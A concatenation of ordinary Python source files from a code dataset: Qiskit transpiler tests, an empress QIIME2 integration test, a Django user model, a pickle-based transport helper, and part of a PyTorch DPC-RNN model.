mapped_qubits.append(qargs[0].index)
self.assertEqual(mapped_qubits, [4, 6, 10])
def test_mapping_multi_qreg(self):
"""Test mapping works for multiple qregs.
"""
backend = FakeRueschlikon()
qr = QuantumRegister(3, name='qr')
qr2 = QuantumRegister(1, name='qr2')
qr3 = QuantumRegister(4, name='qr3')
cr = ClassicalRegister(3, name='cr')
qc = QuantumCircuit(qr, qr2, qr3, cr)
qc.h(qr[0])
qc.cx(qr[0], qr2[0])
qc.cx(qr[1], qr3[2])
qc.measure(qr, cr)
circuits = transpile(qc, backend)
self.assertIsInstance(circuits, QuantumCircuit)
def test_transpile_circuits_diff_registers(self):
"""Transpile list of circuits with different qreg names.
"""
backend = FakeRueschlikon()
circuits = []
for _ in range(2):
qr = QuantumRegister(2)
cr = ClassicalRegister(2)
circuit = QuantumCircuit(qr, cr)
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.measure(qr, cr)
circuits.append(circuit)
circuits = transpile(circuits, backend)
self.assertIsInstance(circuits[0], QuantumCircuit)
def test_wrong_initial_layout(self):
"""Test transpile with a bad initial layout.
"""
backend = FakeMelbourne()
qubit_reg = QuantumRegister(2, name='q')
clbit_reg = ClassicalRegister(2, name='c')
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
bad_initial_layout = [QuantumRegister(3, 'q')[0],
QuantumRegister(3, 'q')[1],
QuantumRegister(3, 'q')[2]]
with self.assertRaises(TranspilerError) as cm:
transpile(qc, backend, initial_layout=bad_initial_layout)
self.assertEqual("FullAncillaAllocation: The layout refers to a quantum register that does "
"not exist in circuit.", cm.exception.message)
def test_parameterized_circuit_for_simulator(self):
"""Verify that a parameterized circuit can be transpiled for a simulator backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
qc.rz(theta, qr[0])
transpiled_qc = transpile(qc, backend=BasicAer.get_backend('qasm_simulator'))
expected_qc = QuantumCircuit(qr, global_phase=-1 * theta / 2.0)
expected_qc.append(U1Gate(theta), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_parameterized_circuit_for_device(self):
"""Verify that a parameterized circuit can be transpiled for a device backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
qc.rz(theta, qr[0])
transpiled_qc = transpile(qc, backend=FakeMelbourne(),
initial_layout=Layout.generate_trivial_layout(qr))
qr = QuantumRegister(14, 'q')
expected_qc = QuantumCircuit(qr, global_phase=-1 * theta / 2.0)
expected_qc.append(U1Gate(theta), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_parameter_expression_circuit_for_simulator(self):
"""Verify that a circuit including expressions of parameters can be
transpiled for a simulator backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
square = theta * theta
qc.rz(square, qr[0])
transpiled_qc = transpile(qc, backend=BasicAer.get_backend('qasm_simulator'))
expected_qc = QuantumCircuit(qr, global_phase=-1 * square / 2.0)
expected_qc.append(U1Gate(square), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_parameter_expression_circuit_for_device(self):
"""Verify that a circuit including expressions of parameters can be
transpiled for a device backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
square = theta * theta
qc.rz(square, qr[0])
transpiled_qc = transpile(qc, backend=FakeMelbourne(),
initial_layout=Layout.generate_trivial_layout(qr))
qr = QuantumRegister(14, 'q')
expected_qc = QuantumCircuit(qr, global_phase=-1 * square / 2.0)
expected_qc.append(U1Gate(square), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_final_measurement_barrier_for_devices(self):
"""Verify BarrierBeforeFinalMeasurements pass is called in default pipeline for devices."""
circ = QuantumCircuit.from_qasm_file(self._get_resource_path('example.qasm', Path.QASMS))
layout = Layout.generate_trivial_layout(*circ.qregs)
orig_pass = BarrierBeforeFinalMeasurements()
with patch.object(BarrierBeforeFinalMeasurements, 'run', wraps=orig_pass.run) as mock_pass:
transpile(circ, coupling_map=FakeRueschlikon().configuration().coupling_map,
initial_layout=layout)
self.assertTrue(mock_pass.called)
def test_do_not_run_cxdirection_with_symmetric_cm(self):
"""When the coupling map is symmetric, do not run CXDirection."""
circ = QuantumCircuit.from_qasm_file(self._get_resource_path('example.qasm', Path.QASMS))
layout = Layout.generate_trivial_layout(*circ.qregs)
coupling_map = []
for node1, node2 in FakeRueschlikon().configuration().coupling_map:
coupling_map.append([node1, node2])
coupling_map.append([node2, node1])
orig_pass = CXDirection(CouplingMap(coupling_map))
with patch.object(CXDirection, 'run', wraps=orig_pass.run) as mock_pass:
transpile(circ, coupling_map=coupling_map, initial_layout=layout)
self.assertFalse(mock_pass.called)
def test_optimize_to_nothing(self):
""" Optimize gates up to fixed point in the default pipeline
See https://github.com/Qiskit/qiskit-terra/issues/2035 """
qr = QuantumRegister(2)
circ = QuantumCircuit(qr)
circ.h(qr[0])
circ.cx(qr[0], qr[1])
circ.x(qr[0])
circ.y(qr[0])
circ.z(qr[0])
circ.cx(qr[0], qr[1])
circ.h(qr[0])
circ.cx(qr[0], qr[1])
circ.cx(qr[0], qr[1])
after = transpile(circ, coupling_map=[[0, 1], [1, 0]],
basis_gates=['u3', 'u2', 'u1', 'cx'])
expected = QuantumCircuit(QuantumRegister(2, 'q'), global_phase=-np.pi/2)
self.assertEqual(after, expected)
def test_pass_manager_empty(self):
"""Test passing an empty PassManager() to the transpiler.
It should perform no transformations on the circuit.
"""
qr = QuantumRegister(2)
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
resources_before = circuit.count_ops()
pass_manager = PassManager()
out_circuit = pass_manager.run(circuit)
resources_after = out_circuit.count_ops()
self.assertDictEqual(resources_before, resources_after)
def test_move_measurements(self):
"""Measurements applied AFTER swap mapping.
"""
backend = FakeRueschlikon()
cmap = backend.configuration().coupling_map
circ = QuantumCircuit.from_qasm_file(
self._get_resource_path('move_measurements.qasm', Path.QASMS))
lay = [0, 1, 15, 2, 14, 3, 13, 4, 12, 5, 11, 6]
out = transpile(circ, initial_layout=lay, coupling_map=cmap)
out_dag = circuit_to_dag(out)
meas_nodes = out_dag.named_nodes('measure')
for meas_node in meas_nodes:
is_last_measure = all(after_measure.type == 'out'
for after_measure in out_dag.quantum_successors(meas_node))
self.assertTrue(is_last_measure)
def test_initialize_reset_should_be_removed(self):
"""The reset in front of initializer should be removed when zero state"""
qr = QuantumRegister(1, "qr")
qc = QuantumCircuit(qr)
qc.initialize([1.0 / math.sqrt(2), 1.0 / math.sqrt(2)], [qr[0]])
qc.initialize([1.0 / math.sqrt(2), -1.0 / math.sqrt(2)], [qr[0]])
expected = QuantumCircuit(qr)
expected.append(U3Gate(1.5708, 0, 0), [qr[0]])
expected.reset(qr[0])
expected.append(U3Gate(1.5708, 3.1416, 0), [qr[0]])
after = transpile(qc, basis_gates=['reset', 'u3'], optimization_level=1)
self.assertEqual(after, expected)
def test_initialize_FakeMelbourne(self):
"""Test that the zero-state resets are remove in a device not supporting them.
"""
desired_vector = [1 / math.sqrt(2), 0, 0, 0, 0, 0, 0, 1 / math.sqrt(2)]
qr = QuantumRegister(3, "qr")
qc = QuantumCircuit(qr)
qc.initialize(desired_vector, [qr[0], qr[1], qr[2]])
out = transpile(qc, backend=FakeMelbourne())
out_dag = circuit_to_dag(out)
reset_nodes = out_dag.named_nodes('reset')
self.assertEqual(reset_nodes, [])
def test_non_standard_basis(self):
"""Test a transpilation with a non-standard basis"""
qr1 = QuantumRegister(1, 'q1')
qr2 = QuantumRegister(2, 'q2')
qr3 = QuantumRegister(3, 'q3')
qc = QuantumCircuit(qr1, qr2, qr3)
qc.h(qr1[0])
qc.h(qr2[1])
qc.h(qr3[2])
layout = [4, 5, 6, 8, 9, 10]
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10], [5, 4], [5, 6], [5, 9],
[6, 8], [7, 8], [9, 8], [9, 10], [11, 3], [11, 10], [11, 12], [12, 2], [13, 1],
[13, 12]]
circuit = transpile(qc, backend=None, coupling_map=cmap,
basis_gates=['h'], initial_layout=layout)
dag_circuit = circuit_to_dag(circuit)
resources_after = dag_circuit.count_ops()
self.assertEqual({'h': 3}, resources_after)
def test_hadamard_to_rot_gates(self):
"""Test a transpilation from H to Rx, Ry gates"""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
qc.h(0)
expected = QuantumCircuit(qr, global_phase=np.pi/2)
expected.append(RYGate(theta=np.pi/2), [0])
expected.append(RXGate(theta=np.pi), [0])
circuit = transpile(qc, basis_gates=['rx', 'ry'], optimization_level=0)
self.assertEqual(circuit, expected)
def test_basis_subset(self):
"""Test a transpilation with a basis subset of the standard basis"""
qr = QuantumRegister(1, 'q1')
qc = QuantumCircuit(qr)
qc.h(qr[0])
qc.x(qr[0])
qc.t(qr[0])
layout = [4]
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10], [5, 4], [5, 6], [5, 9],
[6, 8], [7, 8], [9, 8], [9, 10], [11, 3], [11, 10], [11, 12], [12, 2], [13, 1],
[13, 12]]
circuit = transpile(qc, backend=None, coupling_map=cmap,
basis_gates=['u3'], initial_layout=layout)
dag_circuit = circuit_to_dag(circuit)
resources_after = dag_circuit.count_ops()
self.assertEqual({'u3': 1}, resources_after)
def test_check_circuit_width(self):
"""Verify transpilation of circuit with virtual qubits greater than
physical qubits raises error"""
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10], [5, 4],
[5, 6], [5, 9], [6, 8], [7, 8], [9, 8], [9, 10],
[11, 3], [11, 10], [11, 12], [12, 2], [13, 1], [13, 12]]
qc = QuantumCircuit(15, 15)
with self.assertRaises(TranspilerError):
transpile(qc, coupling_map=cmap)
@data(0, 1, 2, 3)
def test_ccx_routing_method_none(self, optimization_level):
"""CCX without routing method."""
qc = QuantumCircuit(3)
qc.cx(0, 1)
qc.cx(1, 2)
out = transpile(qc, routing_method='none',
basis_gates=['u', 'cx'], initial_layout=[0, 1, 2], seed_transpiler=0,
coupling_map=[[0, 1], [1, 2]], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_ccx_routing_method_none_failed(self, optimization_level):
"""CCX without routing method cannot be routed."""
qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)
with self.assertRaises(TranspilerError):
transpile(qc, routing_method='none',
basis_gates=['u', 'cx'], initial_layout=[0, 1, 2], seed_transpiler=0,
coupling_map=[[0, 1], [1, 2]], optimization_level=optimization_level)
@data(0, 1, 2, 3)
def test_ms_unrolls_to_cx(self, optimization_level):
"""Verify a Rx,Ry,Rxx circuit transpile to a U3,CX target."""
qc = QuantumCircuit(2)
qc.rx(math.pi / 2, 0)
qc.ry(math.pi / 4, 1)
qc.rxx(math.pi / 4, 0, 1)
out = transpile(qc, basis_gates=['u3', 'cx'], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_ms_can_target_ms(self, optimization_level):
"""Verify a Rx,Ry,Rxx circuit can transpile to an Rx,Ry,Rxx target."""
qc = QuantumCircuit(2)
qc.rx(math.pi / 2, 0)
qc.ry(math.pi / 4, 1)
qc.rxx(math.pi / 4, 0, 1)
out = transpile(qc, basis_gates=['rx', 'ry', 'rxx'], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_cx_can_target_ms(self, optimization_level):
"""Verify a U3,CX circuit can transpiler to a Rx,Ry,Rxx target."""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
qc.rz(math.pi / 4, [0, 1])
out = transpile(qc, basis_gates=['rx', 'ry', 'rxx'], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_measure_doesnt_unroll_ms(self, optimization_level):
"""Verify a measure doesn't cause an Rx,Ry,Rxx circuit to unroll to U3,CX."""
qc = QuantumCircuit(2, 2)
qc.rx(math.pi / 2, 0)
qc.ry(math.pi / 4, 1)
qc.rxx(math.pi / 4, 0, 1)
qc.measure([0, 1], [0, 1])
out = transpile(qc, basis_gates=['rx', 'ry', 'rxx'], optimization_level=optimization_level)
self.assertEqual(qc, out)
@data(
['cx', 'u3'],
['cz', 'u3'],
['cz', 'rx', 'rz'],
['rxx', 'rx', 'ry'],
['iswap', 'rx', 'rz'],
)
def test_block_collection_runs_for_non_cx_bases(self, basis_gates):
"""Verify block collection is run when a single two qubit gate is in the basis."""
twoq_gate, *_ = basis_gates
qc = QuantumCircuit(2)
qc.cx(0, 1)
qc.cx(1, 0)
qc.cx(0, 1)
qc.cx(0, 1)
out = transpile(qc, basis_gates=basis_gates, optimization_level=3)
self.assertLessEqual(out.count_ops()[twoq_gate], 2)
@unpack
@data(
(['u3', 'cx'], {'u3': 1, 'cx': 1}),
(['rx', 'rz', 'iswap'], {'rx': 6, 'rz': 12, 'iswap': 2}),
(['rx', 'ry', 'rxx'], {'rx': 6, 'ry': 5, 'rxx': 1}),
)
def test_block_collection_reduces_1q_gate(self, basis_gates, gate_counts):
"""For synthesis to non-U3 bases, verify we minimize 1q gates."""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
out = transpile(qc, basis_gates=basis_gates, optimization_level=3)
self.assertTrue(Operator(out).equiv(qc))
self.assertTrue(set(out.count_ops()).issubset(basis_gates))
for basis_gate in basis_gates:
self.assertLessEqual(out.count_ops()[basis_gate], gate_counts[basis_gate])
@combine(
optimization_level=[0, 1, 2, 3],
basis_gates=[
['u3', 'cx'],
['rx', 'rz', 'iswap'],
['rx', 'ry', 'rxx'],
],
)
def test_translation_method_synthesis(self, optimization_level, basis_gates):
"""Verify translation_method='synthesis' gets to the basis."""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
out = transpile(qc, translation_method='synthesis',
basis_gates=basis_gates,
optimization_level=optimization_level)
self.assertTrue(Operator(out).equiv(qc))
self.assertTrue(set(out.count_ops()).issubset(basis_gates))
def test_transpiled_custom_gates_calibration(self):
"""Test if transpiled calibrations is equal to custom gates circuit calibrations."""
custom_180 = Gate("mycustom", 1, [3.14])
custom_90 = Gate("mycustom", 1, [1.57])
circ = QuantumCircuit(2)
circ.append(custom_180, [0])
circ.append(custom_90, [1])
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
with pulse.build() as q1_y90:
pulse.play(pulse.library.Gaussian(20, -1.0, 3.0), pulse.DriveChannel(1))
# Add calibration
circ.add_calibration(custom_180, [0], q0_x180)
circ.add_calibration(custom_90, [1], q1_y90)
backend = FakeAlmaden()
transpiled_circuit = transpile(
circ,
backend=backend,
)
self.assertEqual(transpiled_circuit.calibrations, circ.calibrations)
self.assertEqual(list(transpiled_circuit.count_ops().keys()), ['mycustom'])
self.assertEqual(list(transpiled_circuit.count_ops().values()), [2])
def test_transpiled_basis_gates_calibrations(self):
"""Test if the transpiled calibrations is equal to basis gates circuit calibrations."""
circ = QuantumCircuit(2)
circ.h(0)
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
# Add calibration
circ.add_calibration("h", [0], q0_x180)
backend = FakeAlmaden()
transpiled_circuit = transpile(
circ,
backend=backend,
)
self.assertEqual(transpiled_circuit.calibrations, circ.calibrations)
def test_transpile_calibrated_custom_gate_on_diff_qubit(self):
"""Test if the custom, non calibrated gate raises QiskitError."""
custom_180 = Gate("mycustom", 1, [3.14])
circ = QuantumCircuit(2)
circ.append(custom_180, [0])
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
# Add calibration
circ.add_calibration(custom_180, [1], q0_x180)
backend = FakeAlmaden()
with self.assertRaises(QiskitError):
transpile(circ, backend=backend)
def test_transpile_calibrated_nonbasis_gate_on_diff_qubit(self):
"""Test if the non-basis gates are transpiled if they are on different qubit that
is not calibrated."""
circ = QuantumCircuit(2)
circ.h(0)
circ.h(1)
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
# Add calibration
circ.add_calibration("h", [1], q0_x180)
backend = FakeAlmaden()
transpiled_circuit = transpile(
circ,
backend=backend,
)
self.assertEqual(transpiled_circuit.calibrations, circ.calibrations)
self.assertEqual(set(transpiled_circuit.count_ops().keys()), {'u2', 'h'})
def test_transpile_subset_of_calibrated_gates(self):
"""Test transpiling a circuit with both basis gate (not-calibrated) and
a calibrated gate on different qubits."""
x_180 = Gate('mycustom', 1, [3.14])
circ = QuantumCircuit(2)
circ.h(0)
circ.append(x_180, [0])
circ.h(1)
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
circ.add_calibration(x_180, [0], q0_x180)
circ.add_calibration('h', [1], q0_x180) # 'h' is calibrated on qubit 1
transpiled_circ = transpile(circ, FakeAlmaden())
self.assertEqual(set(transpiled_circ.count_ops().keys()), {'u2', 'mycustom', 'h'})
def test_parameterized_calibrations_transpile(self):
"""Check that gates can be matched to their calibrations before and after parameter
assignment."""
tau = Parameter('tau')
circ = QuantumCircuit(3, 3)
circ.append(Gate('rxt', 1, [2*3.14*tau]), [0])
def q0_rxt(tau):
with pulse.build() as q0_rxt:
pulse.play(pulse.library.Gaussian(20, 0.4*tau, 3.0), pulse.DriveChannel(0))
return q0_rxt
circ.add_calibration('rxt', [0], q0_rxt(tau), [2*3.14*tau])
transpiled_circ = transpile(circ, FakeAlmaden())
self.assertEqual(set(transpiled_circ.count_ops().keys()), {'rxt'})
circ = circ.assign_parameters({tau: 1})
transpiled_circ = transpile(circ, FakeAlmaden())
self.assertEqual(set(transpiled_circ.count_ops().keys()), {'rxt'})
def test_inst_durations_from_calibrations(self):
"""Test that circuit calibrations can be used instead of explicitly
supplying inst_durations.
"""
qc = QuantumCircuit(2)
qc.append(Gate('custom', 1, []), [0])
with pulse.build() as cal:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
qc.add_calibration('custom', [0], cal)
out = transpile(qc, scheduling_method='alap')
self.assertEqual(out.duration, cal.duration)
@data(0, 1, 2, 3)
def test_circuit_with_delay(self, optimization_level):
"""Verify a circuit with delay can transpile to a scheduled circuit."""
qc = QuantumCircuit(2)
qc.h(0)
qc.delay(500, 1)
qc.cx(0, 1)
out = transpile(qc, scheduling_method='alap', basis_gates=['h', 'cx'],
instruction_durations=[('h', 0, 200), ('cx', [0, 1], 700)],
optimization_level=optimization_level)
self.assertEqual(out.duration, 1200)
def test_delay_converts_to_dt(self):
"""Test that a delay instruction is converted to units of dt given a backend."""
qc = QuantumCircuit(2)
qc.delay(1000, [0], unit='us')
backend = FakeRueschlikon()
backend.configuration().dt = 0.5e-6
out = transpile([qc, qc], backend)
self.assertEqual(out[0].data[0][0].unit, 'dt')
self.assertEqual(out[1].data[0][0].unit, 'dt')
out = transpile(qc, dt=1e-9)
self.assertEqual(out.data[0][0].unit, 'dt')
@data(1, 2, 3)
def test_no_infinite_loop(self, optimization_level):
"""Verify circuit cost always descends and optimization does not flip flop indefinitely."""
qc = QuantumCircuit(1)
qc.ry(0.2, 0)
out = transpile(qc, basis_gates=['id', 'p', 'sx', 'cx'],
optimization_level=optimization_level)
# Expect a -pi/2 global phase for the U3 to RZ/SX conversion, and
# a -0.5 * theta phase for RZ to P twice, once at theta, and once at 3 pi
# for the second and third RZ gates in the U3 decomposition.
expected = QuantumCircuit(1, global_phase=-np.pi/2 - 0.5 * (0.2 + np.pi) - 0.5 * 3 * np.pi)
expected.sx(0)
expected.p(np.pi + 0.2, 0)
expected.sx(0)
expected.p(np.pi, 0)
error_message = "\nOutput circuit:\n%s\nExpected circuit:\n%s" % (
str(out), str(expected))
self.assertEqual(out, expected, error_message)
@data(0, 1, 2, 3)
def test_transpile_preserves_circuit_metadata(self, optimization_level):
"""Verify that transpile preserves circuit metadata in the output."""
circuit = QuantumCircuit(2, metadata=dict(experiment_id='1234', execution_number=4))
circuit.h(0)
circuit.cx(0, 1)
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10],
[5, 4], [5, 6], [5, 9], [6, 8], [7, 8],
[9, 8], [9, 10], [11, 3], [11, 10],
[11, 12], [12, 2], [13, 1], [13, 12]]
res = transpile(circuit, basis_gates=['id', 'p', 'sx', 'cx'],
coupling_map=cmap,
optimization_level=optimization_level)
self.assertEqual(circuit.metadata, res.metadata)
class StreamHandlerRaiseException(StreamHandler):
"""Handler class that will raise an exception on formatting errors."""
def handleError(self, record):
raise sys.exc_info()
class TestLogTranspile(QiskitTestCase):
"""Testing the log_transpile option."""
def setUp(self):
super().setUp()
logger = getLogger()
self.addCleanup(logger.setLevel, logger.level)
logger.setLevel('DEBUG')
self.output = io.StringIO()
logger.addHandler(StreamHandlerRaiseException(self.output))
self.circuit = QuantumCircuit(QuantumRegister(1))
def assertTranspileLog(self, log_msg):
""" Runs the transpiler and check for logs containing specified message"""
transpile(self.circuit)
self.output.seek(0)
# Filter unrelated log lines
output_lines = self.output.readlines()
transpile_log_lines = [x for x in output_lines if log_msg in x]
self.assertTrue(len(transpile_log_lines) > 0)
def test_transpile_log_time(self):
"""Check Total Transpile Time is logged"""
self.assertTranspileLog('Total Transpile Time')
class TestTranspileCustomPM(QiskitTestCase):
"""Test transpile function with custom pass manager"""
def test_custom_multiple_circuits(self):
"""Test transpiling with custom pass manager and multiple circuits.
This tests created a deadlock, so it needs to be monitored for timeout.
See: https://github.com/Qiskit/qiskit-terra/issues/3925
"""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
pm_conf = PassManagerConfig(
initial_layout=None,
basis_gates=['u1', 'u2', 'u3', 'cx'],
coupling_map=CouplingMap([[0, 1]]),
backend_properties=None,
seed_transpiler=1
)
passmanager = level_0_pass_manager(pm_conf)
transpiled = passmanager.run([qc, qc])
expected = QuantumCircuit(QuantumRegister(2, 'q'))
expected.append(U2Gate(0, 3.141592653589793), [0])
expected.cx(0, 1)
self.assertEqual(len(transpiled), 2)
self.assertEqual(transpiled[0], expected)
self.assertEqual(transpiled[1], expected)
| 38.73873 | 100 | 0.594196 |
711ab040d7f36bb981855ef874ffe67211edd915 | 3,253 | py | Python | tests/python/test_integration.py | sjanssen2/empress | 39a342de88b19ea41bf7adabd1016878e24de0d8 | [
"Apache-2.0",
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | tests/python/test_integration.py | sjanssen2/empress | 39a342de88b19ea41bf7adabd1016878e24de0d8 | [
"Apache-2.0",
"CC0-1.0",
"BSD-3-Clause"
] | 1 | 2019-11-18T20:38:12.000Z | 2019-11-18T20:38:12.000Z | tests/python/test_integration.py | sjanssen2/empress | 39a342de88b19ea41bf7adabd1016878e24de0d8 | [
"Apache-2.0",
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, empress development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import os
import unittest
from qiime2 import Artifact, Metadata
from qiime2.sdk import Results, Visualization
from qiime2.plugin.testing import TestPluginBase
class TestIntegration(TestPluginBase):
"""Runs an integration test using the moving pictures tutorial data.
This assumes that tests are being run from the root directory of Empress.
References
----------
This test class was adapted from q2-diversity:
https://github.com/qiime2/q2-diversity/blob/ebb99f8af91f7fe10cb44cd237931b072a7b4fee/q2_diversity/tests/test_beta_correlation.py
"""
package = "empress"
def setUp(self):
super().setUp()
# Just for reference for anyone reading this, self.plugin is set upon
# calling super().setUp() which looks at the "package" variable set
# above
self.plot = self.plugin.visualizers["plot"]
# Load the various input QZAs/etc. needed to run this test
prefixdir = os.path.join("docs", "moving-pictures")
self.tree = Artifact.load(os.path.join(prefixdir, "rooted-tree.qza"))
self.table = Artifact.load(os.path.join(prefixdir, "table.qza"))
self.md = Metadata.load(os.path.join(prefixdir, "sample_metadata.tsv"))
# We have to transform the taxonomy QZA to Metadata ourselves
self.taxonomy = Artifact.load(os.path.join(prefixdir, "taxonomy.qza"))
self.fmd = self.taxonomy.view(Metadata)
# Helps us distinguish between if the test was successful or not
self.result = None
# If the test was successful, we'll save the output QZV to this path
# during tearDown().
self.output_path = os.path.join(prefixdir, "empress-tree.qzv")
def test_execution(self):
"""Just checks that the visualizer at least runs without errors."""
self.result = self.plot(tree=self.tree, feature_table=self.table,
sample_metadata=self.md,
feature_metadata=self.fmd)
self.assertIsInstance(self.result, Results)
self.assertIsInstance(self.result.visualization, Visualization)
# TODO check details of viz more carefully (likely by digging into the
# index HTML of self.result.visualization, etc.)
def tearDown(self):
super().tearDown()
# Only overwrite "empress-tree.qzv" if the visualization was generated
# successfully. Note that "successfully" here just means that the test
# above passes -- in the future (if/when that TODO is addressed, and
# the contents of the generated visualization are inspected in detail),
# we could modify things to prevent overwriting this path if any of the
# additional tests we'd add would fail.
if self.result is not None:
self.result.visualization.save(self.output_path)
if __name__ == "__main__":
unittest.main()
| 41.705128 | 132 | 0.648017 |
f5b42bfd655f005dd97dd47c0f29499d96b5c223 | 794 | py | Python | accounts/models.py | towhid135/EasyApply | 0cb4a16405d70d48b1a06dc0f7206651d2fd353d | [
"MIT"
] | null | null | null | accounts/models.py | towhid135/EasyApply | 0cb4a16405d70d48b1a06dc0f7206651d2fd353d | [
"MIT"
] | null | null | null | accounts/models.py | towhid135/EasyApply | 0cb4a16405d70d48b1a06dc0f7206651d2fd353d | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.db import models
from accounts.managers import UserManager
GENDER_CHOICES = (
('male', 'Male'),
('female', 'Female'))
class User(AbstractUser):
username = None
role = models.CharField(max_length=12, error_messages={
'required': "Role must be provided"
})
gender = models.CharField(max_length=10, blank=True, null=True, default="")
email = models.EmailField(unique=True, blank=False,
error_messages={
'unique': "A user with that email already exists.",
})
USERNAME_FIELD = "email"
REQUIRED_FIELDS = []
def __unicode__(self):
return self.email
objects = UserManager()
| 24.8125 | 85 | 0.602015 |
b715abd31d940bf28f8a1650d690409f9161bddd | 841 | py | Python | lab/device/protocol.py | ParanoiaSYT/Qulab-backup | 09ec5457145b3789d4c1ac02c43dd3e6dfafc96f | [
"MIT"
] | null | null | null | lab/device/protocol.py | ParanoiaSYT/Qulab-backup | 09ec5457145b3789d4c1ac02c43dd3e6dfafc96f | [
"MIT"
] | null | null | null | lab/device/protocol.py | ParanoiaSYT/Qulab-backup | 09ec5457145b3789d4c1ac02c43dd3e6dfafc96f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pickle
import base64
import json
DEFAULT_PORT = 8123
class Transport():
def __init__(self):
self.protocol = pickle.HIGHEST_PROTOCOL
def pack(self, obj):
buff = pickle.dumps(obj, protocol=self.protocol)
return base64.b64encode(buff).decode()
def unpack(self, s):
buff = base64.b64decode(s)
return pickle.loads(buff)
def encode(self, obj, protocol=None):
protocol = self.protocol if protocol is None else protocol
data = {
'protocol': protocol,
'body': self.pack(obj)
}
return json.dumps(data)
def decode(self, s):
data = json.loads(s)
return self.unpack(data['body'])
def highest_protocol(self):
return pickle.HIGHEST_PROTOCOL
| 24.735294 | 67 | 0.587396 |
04ac3e36b008c0861a5a064884b8fe44c41fa7dd | 15,490 | py | Python | uc-dpc/model_3d.py | lovish1234/TPC | 10e93eeb0e22e411579cfb9f94fac7870f6e2039 | [
"MIT"
] | null | null | null | uc-dpc/model_3d.py | lovish1234/TPC | 10e93eeb0e22e411579cfb9f94fac7870f6e2039 | [
"MIT"
] | null | null | null | uc-dpc/model_3d.py | lovish1234/TPC | 10e93eeb0e22e411579cfb9f94fac7870f6e2039 | [
"MIT"
] | null | null | null | # get the model as DPC-RNN
import sys
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
sys.path.append('../uc-backbone')
# to extract the features
from select_backbone import select_resnet
# to aggregate the features in one
from convrnn import ConvGRU
class DPC_RNN(nn.Module):
'''DPC with RNN'''
def __init__(self,
sample_size,
num_seq=8,
seq_len=5,
pred_step=3,
network='resnet10',
distance='L2',
distance_type='uncertain',
positive_vs_negative='same',
radius_type='linear',
radius_which='pred'):
super(DPC_RNN, self).__init__()
# to reproduce the experiments
torch.cuda.manual_seed(233)
print('[model_3d.py] Using DPC-RNN model')
# number of dimensions in the image
self.sample_size = sample_size
self.num_seq = num_seq
self.seq_len = seq_len
self.distance = distance
self.distance_type = distance_type
self.positive_vs_negative = positive_vs_negative
self.radius_which = radius_which
self.radius_type = radius_type
print('[model_3d.py] Using distance metric : ', self.distance)
print('[model_3d.py] Using distance type : ', self.distance_type)
print('[model_3d.py] Treating positive and negative instances as : ',
self.positive_vs_negative)
print('[model_3d.py] Using radius type : ', self.radius_type)
# how many futures to predict
self.pred_step = pred_step
# what is sample size ?
# 2 if seq_len is 5
if network == 'resnet8' or network == 'resnet10':
self.last_duration = int(math.ceil(seq_len / 2))
else:
self.last_duration = int(math.ceil(seq_len / 4))
self.last_size = int(math.ceil(sample_size / 32))
# print('final feature map has size %dx%d' %
# (self.last_size, self.last_size))
# f - choose an appropriate feature extractor. In this case, a resent
self.backbone, self.param = select_resnet(
network, track_running_stats=False,
distance_type=self.distance_type,
radius_type=self.radius_type)
#print (self.param)
# number of layers in GRU
self.param['num_layers'] = 1 # param for GRU
